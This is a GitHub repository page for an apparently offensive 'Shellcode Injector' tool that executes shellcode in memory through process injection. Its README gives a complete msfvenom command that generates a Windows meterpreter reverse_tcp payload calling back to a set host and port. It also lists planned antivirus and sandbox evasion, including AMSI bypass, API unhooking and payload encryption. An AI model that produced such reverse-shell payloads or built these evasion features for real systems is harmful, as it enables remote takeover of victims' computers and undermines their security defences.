Skip to content

Nicolas-Arsenault/run-shellcode-in-memory

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

Shellcode Injector

instructions

  1. Gen your msfvenom shellcode : msfvenom -platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 -f c --var-name=wannabe
  2. Put your shellcode in the wannabe variable.

UPDATES

  • Added IAT camouflage
  • Added Force loading kernel32.dll
  • More to come.. need to bypass runtime...

To do

  • Add Sanbox detection (behavioral evasion)
  • Add payload encryption and decryption (static bypass)
  • Bypass execution (amsi + api unhooking)
  • Get shellcode from exe file and saving it in the var
  • UI

Warning

This does not bypass AV as of now, we did not implement anything for it. If you want to contribute and add it, feel free to do so. This is simply to play with memory allocation and execution.

image

About

Can run a payload shellcode in-memory by injecting a process. (does not bypass AV).

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages